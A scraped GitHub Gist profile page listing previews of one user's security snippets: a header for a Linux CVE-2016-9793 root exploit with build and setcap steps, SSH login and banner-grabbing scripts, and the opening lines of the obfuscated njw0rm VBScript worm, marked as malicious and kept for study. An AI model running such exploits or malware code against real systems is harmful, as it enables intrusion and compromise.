Skip to content

Instantly share code, notes, and snippets.

nanotechz9l

  • https://twitter.com/nanotechz9l
  • https://0xbugs.blogspot.com
Block or report user

Report or block nanotechz9l

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@nanotechz9l
nanotechz9l / CVE-2016-9793.c
Created May 21, 2017
Linux priv esc (CVE-2016-9793)
View CVE-2016-9793.c
// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793
// No KASLR, SMEP or SMAP bypass included
// Affected kernels: 3.11 -> 4.8
// Tested in QEMU only
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
//
// Usage:
// # gcc -pthread exploit.c -o exploit
// # chown guest:guest exploit
// # setcap cap_net_admin+ep ./exploit
View juniper_fw.rb
#!/usr/bin/env ruby
require '/root/Desktop/juniper_hash.rb';#require 'sugar'
# Parser script for Sweet tooth!
# DL juniper_hash.rb: https://github.com/sventantau/juniper_hash/blob/master/juniper_hash.rb
begin
unless ARGV.length == 1
puts "Doh! - Missing arguments. A Juniper FW config file must be given as an ARGV! Correct usage below:"#.foreground(:yellow).bright
puts "\n#{$0} juniper_fw.conf\n"#.foreground(:white).bright
#exit
View banner.rb
#!/usr/bin/env ruby
require 'rainbow/ext/string';require 'open-uri'
# Written by nanotechz9l
unless ARGV.length == 2
puts "\nMissing argument!".foreground(:red).bright.blink
puts "\nPerforming banner grabs on multiple hosts is tedious. Netcat does not save the typed input like HEAD / HTTP/1.0, and HTTP/1.1 200 OK for http headers for example.".foreground(:yellow).bright
puts "I can perform automated banner grabs on a given host. See example below!".foreground(:yellow).bright
puts "\nUsage: ".foreground(:white).bright + "#{$0} yahoo.com 80".foreground(:white).bright
@nanotechz9l
nanotechz9l / rest_api.rb
Created Mar 5, 2014
This script automatically tests a REST API web service with/without user credentials via user supplied input.
View rest_api.rb
#!/usr/bin/env ruby
require 'net/http'; require 'open-uri'; require 'base64'; require 'rainbow'; #require 'nokogiri'
# This script automatically tests a REST API web service with/without user credentials via user supplied input.
def banner()
print """
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_____ ____
<----,\ -- )
View ssh.rb
#!/usr/bin/env ruby
require 'net/ssh' # more details: https://github.com/net-ssh/net-ssh
require 'logger'
if not ARGV[2]
puts "\n[Auto SSH login by Rick Flores (@nanotechz9l)]"
puts "Missing arguments. Correct useage below:\n"
puts "#{$0} ip user pass"
exit(0)
end
@nanotechz9l
nanotechz9l / njw0rm (obfuscated vbScript)
Created Oct 2, 2013
THIS FILE IS MALICIOUS. DO NOT EXECUTE IT!!!!! For de-obfuscation efforts, and historical ref only.
View njw0rm (obfuscated vbScript)
on error resume next
dim puqjutqzym
'@njq8
'#njw0rm
'<[ coded bY njq8 ]>'
On Error Resume Next
WScript.Timeout=0
dim yxbuwnkdhx ' shell
set yxbuwnkdhx =WScript.CreateObject( chrw(118-31) & "S" & chrw(cint(49+50)) & "r" & chrw(cint(25 * 4.2)) & chrw(cint(4928 / 44)) & "t" & chrw(cint(36+10)) & "S" & chrw(cint(104)) & chrw(2727 / 27) & chrw(4.32 * 25) & "l" )
dim dxlyfguatk ' filesystem
You can’t perform that action at this time.